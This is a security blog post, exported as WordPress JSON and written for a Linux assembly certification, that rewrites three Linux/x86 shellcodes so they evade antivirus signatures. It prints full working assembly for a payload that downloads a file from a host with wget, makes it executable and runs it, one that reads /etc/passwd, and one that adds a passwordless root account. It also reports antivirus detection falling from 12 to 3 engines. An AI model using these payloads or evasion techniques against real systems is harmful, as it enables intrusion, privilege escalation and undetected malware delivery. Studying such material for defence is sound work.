{"id":240,"date":"2020-08-28T11:30:00","date_gmt":"2020-08-28T11:30:00","guid":{"rendered":"https:\/\/badbit.vc\/?p=240"},"modified":"2020-09-02T21:08:28","modified_gmt":"2020-09-02T21:08:28","slug":"polymorphic-shellcode","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/polymorphic-shellcode\/","title":{"rendered":"Polymorphic Shellcode"},"content":{"rendered":"\n<p>Polymorphism in the context of Shellcoding can be defined as altering the appearance of the code keeping the core functionality intact. Polymorphic shellcodes are created to beat signature based detection mechanisms which is how Antiviruses attempt to detect malicious files on systems.<\/p>\n\n\n\n<p>In this blogpost, we will take three Linux\/x86 shellcodes from <a href=\"http:\/\/shell-storm.org\/shellcode\/\">shell-storm<\/a> and make a Polymorphic version of each in an attempt to evade signature based detections.<\/p>\n\n\n\n<p>The three Shellcodes are:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li><a href=\"http:\/\/shell-storm.org\/shellcode\/files\/shellcode-862.php\">Download, chmod and execute an executable<\/a><\/li><li><a href=\"http:\/\/shell-storm.org\/shellcode\/files\/shellcode-842.php\">Reads 4096 bytes from \/etc\/passwd file<\/a><\/li><li><a href=\"http:\/\/shell-storm.org\/shellcode\/files\/shellcode-211.php\">Add root user with no password<\/a><\/li><\/ol>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>Let&#8217;s begin with the first one.<\/p>\n\n\n\n<p>1<strong>. 
Download, chmod and execute<\/strong> <strong>an executable<\/strong><\/p>\n\n\n\n<p>Original shellcode as taken from shell-storm.org:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"577\" height=\"924\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200807_004150-1.jpg\" alt=\"\" class=\"wp-image-244\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200807_004150-1.jpg 577w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200807_004150-1-187x300.jpg 187w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200807_004150-1-300x480.jpg 300w\" sizes=\"auto, (max-width: 577px) 100vw, 577px\" \/><\/figure>\n\n\n\n<p>In order to check the detection ratio, I quickly constructed an executable with a standard C harness. Below is the detection rate as seen on VirusTotal. As of now, 12\/73 Antivirus engines can detect the payload. Now let&#8217;s attempt to morph our shellcode and re-upload the file and check the detection rate.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"730\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed-1024x730.jpg\" alt=\"\" class=\"wp-image-246\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed-1024x730.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed-300x214.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed-768x548.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed-850x606.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_not_morphed.jpg 1185w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I have added a comment mark wherever I have morphed the 
instructions:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>global _start\nsection .text\n_start:\n    ;fork\n    xor ebx, ebx ;\n    mov ebx, 0x1 ;\n    xor ebx, ebx ;\n    xor eax,eax\n    mov al,0x2\n    int 0x80\n    xor ebx,ebx\n    cmp eax,ebx\n    jz child\n  \n    ;wait(NULL)\n    xor eax,eax\n    mov al,0x7\n    sub al,0x1 ;\n    inc eax    ;\n    int 0x80\n        \n    ;chmod x\n    xor ecx,ecx\n    xor eax, eax\n    xor edx, edx ;\n    inc edx      ;\n    dec edx      ;\n    push eax\n    mov al, 0xf ;chmod\n    push 0x78   ; x = filename\n    mov ebx, esp ; pathname\n    xor ecx, ecx\n    mov cx, 0x1ff ; 511\n    int 0x80\n    \n    ;exec x\n    xor eax, eax\n    push eax\n    push 0x78\n    mov ebx, esp\n    push eax\n    mov edx, esp\n    push ebx\n    mov ecx, esp\n    mov al, 20 ;\n    sub al, 9  ; al = 11\n;    mov al, 11\n    int 0x80\n    \nchild:\n    ;download 192.168.2.222\/\/x with wget\n    push 0xb\n    pop eax\n    cdq\n    push edx\n    \n    push 0x782f2f32 ;2\/\/x avoid null byte\n    push 0x32322e32 ;22.2\n    push 0x2e383631 ;.861\n    push 0x2e323931 ;.291\n    mov ecx,esp\n    push edx\n    \n    push 0x74 ;t\n    push 0x6567772f ;egw\/\n    push 0x6e69622f ;nib\/\n    push 0x7273752f ;rsu\/\n    mov ebx,esp\n    push edx\n    push ecx\n    push ebx\n    mov ecx,esp\n    int 0x80<\/code><\/pre>\n\n\n\n<p>As we can see below, after uploading the executable created from our morphed shellcode on VirusTotal, as of the time when I am writing the post, only 3 out of 72 Antivirus engines could detect our payload. 
However, now that we have submitted it on VT, the payload will soon be signatured.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"730\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed-1024x730.jpg\" alt=\"\" class=\"wp-image-247\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed-1024x730.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed-300x214.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed-768x548.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed-850x606.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/download_chmod_exec_morphed.jpg 1185w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>2<strong>. Read \/etc\/passwd<\/strong><\/p>\n\n\n\n<p>Following is the debugged shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"885\" height=\"626\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/read_etc_passwd.jpg\" alt=\"\" class=\"wp-image-241\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/read_etc_passwd.jpg 885w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/read_etc_passwd-300x212.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/read_etc_passwd-768x543.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/read_etc_passwd-850x601.jpg 850w\" sizes=\"auto, (max-width: 885px) 100vw, 885px\" \/><\/figure>\n\n\n\n<p>Morphed version:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>global _start\n_start:\n\txor    ecx,ecx\n\tmul    ecx\n\tmov    al,0x5\n\tdec    al ;\n\tinc    al ;\n\tpush   ecx\n\tpush   0x64777373\n\tpush   0x61702f63\n\tpush   0x74652f2f\n\tmov    ebx,esp\n\tint    0x80\n\txchg   
ebx,eax\n\txchg   ecx,eax\n\txchg   eax,ecx ;\n\txchg   ecx,eax ;\n\tmov    al,0x3\n\txor    edx,edx\n\tmov    dx,0xfff\n\tinc    edx ;\n\tdec    edx ;\n\tinc    edx\n\tint    0x80\n\txchg   edx,eax\n\txor    eax,eax\n\tmov    al,0x5 ;\n\tdec    al     ;\n\tmov    al,0x4\n\tmov    bl,0x1\n\tint    0x80\n\txchg   ebx,eax\n\tint    0x80<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>3<strong>. Add root user with no password<\/strong><\/p>\n\n\n\n<p>Below is the original shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"711\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass-1024x711.jpg\" alt=\"\" class=\"wp-image-242\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass-1024x711.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass-300x208.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass-768x534.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass-850x591.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/add_r00t_no_pass.jpg 1235w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Here is the morphed version:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\n section .text\n \n       global _start\n \n  _start:\n       push byte 2 ;\n       push byte 5\n       pop eax\n       xor ecx, ecx\n       push ecx\n       push 0x64777373\n       push 0x61702f2f\n       push 0x6374652f\n       mov eax, 0x5 ;\n       mov ebx, esp\n       mov cx, 02001Q\n       int 0x80\n \n       mov ebx, eax\n \t   \n       push byte 4\n       pop eax\n       xor edx, edx\n       mov edx, 0x10 ;\n       sub edx, 0x10 ;\n       push edx\n       push 0x3a3a3a30\n       push 0x3a303a3a\n       push 0x74303072\n       mov ecx, esp\n       push byte 12\n       pop edx\n       int 0x80\n \n       xor eax, eax ;\n       mov eax, 0x6 
;\n       int 0x80\n \n       push byte 1\n       pop eax\n       int 0x80\n \nsection .data\n       db random: \"loremipsum\", 0x0<\/code><\/pre>\n\n\n\n<p>That&#8217;s all for this post.<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<br><a href=\"http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/\">http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n<p>Student ID: PA-14690<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/bad-bit\/SLAE_x86\/tree\/master\/Polymorphic%20Shellcodes\">Morphed shellcodes Github Repo<\/a><\/p>\n\n\n\n<p>In the <a rel=\"noreferrer noopener\" href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/custom-crypter\/\" target=\"_blank\">next<\/a> post, which is also the last post of this series, we will write our own custom crypter for our payloads.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Polymorphism in the context of Shellcoding can be defined as altering the appearance of the code keeping the core functionality intact. Polymorphic shellcodes are created to beat signature based detection mechanisms which is how Antiviruses attempt to detect malicious files on systems. 
In this blogpost, we will take three Linux\/x86 shellcodes from shell-storm and make&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-240","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=240"}],"version-history":[{"count":7,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240\/revisions"}],"predecessor-version":[{"id":334,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/240\/revisions\/334"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}